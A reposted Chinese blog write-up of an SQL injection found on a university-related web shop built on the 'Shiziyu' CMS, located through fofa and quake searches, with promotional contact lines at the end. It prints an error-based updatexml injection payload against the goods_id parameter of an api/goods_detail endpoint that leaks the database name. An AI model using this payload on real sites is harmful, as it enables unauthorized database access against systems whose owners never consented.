当前位置:   article > 正文

EDU实战-SQL注入漏洞_edu挖洞实战

edu挖洞实战
对于edu来说,是新人挖洞较好的平台,本次记录一次走运的捡漏

0x01 前景
在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点
 

图片


确认目标身份(使用的quake进行然后去ipc备案查询)
 

图片


 

图片


网站后台很像cms搭建的,在查看网站时发现

/seller.php?s=/Public/login

狮子鱼cms的特征
直接去百度一手,发现有个SQL注入还有其他的,打算一个一个尝试看看
 

图片


0x02 尝试挖掘
payload

https://www.xxx.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)

成功爆破出数据库名

图片

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

点赞+在看支持一下吧~

你的点赞是我更新的动力,免费领取安全学习资料包!
+V【zkaq222】或者下面的扫码不然通不过哦,免费领取安全学习资料包!(私聊进群一起学习,共同进步)腾讯文档-在线文档icon-default.png?t=N7T8https://docs.qq.com/doc/DYmVETWlZemh0Ymdv

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/喵喵爱编程/article/detail/891788
推荐阅读
相关标签
  

闽ICP备14008679号